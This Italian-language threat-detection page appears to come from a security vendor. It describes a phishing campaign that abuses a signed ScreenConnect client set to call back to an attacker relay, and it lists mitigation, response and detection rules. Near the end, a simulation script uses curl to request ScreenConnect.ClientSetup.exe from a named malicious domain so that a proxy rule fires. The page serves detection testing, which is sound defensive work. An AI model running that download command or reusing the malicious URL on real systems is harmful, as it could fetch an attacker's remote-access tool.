Client ScreenConnect usato in modo improprio per consentire l’accesso remoto non autorizzato
Detection stack
- AIDR
- Alert
- ETL
- Query
Sommario
Gli aggressori stanno utilizzando email di phishing per distribuire un client ScreenConnect legittimo e preconfigurato. Lo strumento di Monitoraggio e Gestione Remota (RMM) stabilisce una connessione di ritorno a un’istanza controllata dall’attaccante, fornendo accesso remoto ai sistemi compromessi. La campagna sfrutta la natura affidabile del software legittimo per eludere i controlli di sicurezza di base e i meccanismi di rilevamento.
Indagine
L’investigatore ha esaminato un’email di phishing contenente un link che consegnava un file PE. L’analisi ha confermato che il file era un client ScreenConnect legittimo con firma digitale. Tuttavia, la sua configurazione incorporata era stata modificata per connettersi a una specifica istanza di relay e ID istanza controllati dall’attore malintenzionato.
Mitigazione
I browser possono bloccare i download di file eseguibili come primo livello di protezione. Le organizzazioni dovrebbero monitorare l’uso non autorizzato degli strumenti RMM e applicare controlli rigidi sugli eseguibili scaricati da link web non attendibili. Anche il whitelisting delle applicazioni può aiutare a prevenire che client ScreenConnect non autorizzati e altri software RMM non approvati vengano eseguiti.
Risposta
Quando viene rilevata un’attività dannosa, isolare il punto finale interessato per impedire l’accesso remoto continuo da parte dell’attaccante. Identificare e terminare eventuali processi ScreenConnect attivi. Effettuare una revisione forense della configurazione del client per identificare l’infrastruttura di comando e controllo dell’attaccante e determinare l’entità dell’accesso non autorizzato al sistema compromesso.
Flusso di attacco
Stiamo ancora aggiornando questa parte.
Rilevamenti
Software di Accesso Remoto / Gestione Alternativo (tramite process_creation)
Possibile Attività di Comando e Controllo di Comunicazione Tentato dal Dominio del Software di Accesso Remoto (tramite dns)
Distribuzione Malware Client ScreenConnect tramite Email di Phishing [Proxy HTTP]
Esecuzione Simulazione
-
Narrazione e Comandi dell’Attacco: L’avversario mira a stabilire la persistenza su una workstation bersaglio distribuendo ScreenConnect tramite una campagna di phishing. In questa simulazione, replichiamo la fase finale: la macchina della vittima effettua una richiesta HTTP in uscita a un dominio compromesso/maligno per scaricare l’eseguibile di installazione. Per imitare il comportamento specifico identificato nell’intelligence sulla minaccia, l'”attaccante” utilizza una stringa User-Agent personalizzata
ScreenConnectmentre richiede il percorso file specificothelittlecupandsaucer.com.au/ScreenConnect.ClientSetup.exe. Questo attiverà la regola di rilevamento basata su proxy. -
Script di Test di Regressione:
# Questo script utilizza curl per imitare la richiesta di download dannosa identificata nella regola di rilevamento. # Utilizza l'URL specifico e l'User-Agent specifico necessari per attivare l'allerta. TARGET_URL="http://thelittlecupandsaucer.com.au/ScreenConnect.ClientSetup.exe" MALICIOUS_UA="ScreenConnect" echo "[*] Simulazione del tentativo di download di ScreenConnect..." echo "[*] URL: $TARGET_URL" echo "[*] User-Agent: $MALICIOUS_UA" # Usiamo -k per ignorare errori SSL se il dominio simulato utilizza un cert auto-firmato, # e -A per impostare lo User-Agent specifico. curl -k -A "$MALICIOUS_UA" "$TARGET_URL" -o /dev/null echo "[*] Comando di simulazione inviato." -
Comandi di Pulizia:
# Nessun file è stato effettivamente scaricato sull'host nella simulazione (reindirizzato a /dev/null). # Nessuna modifica di sistema è stata fatta. echo "[*] Pulizia completata. Nessuna traccia lasciata sull'host."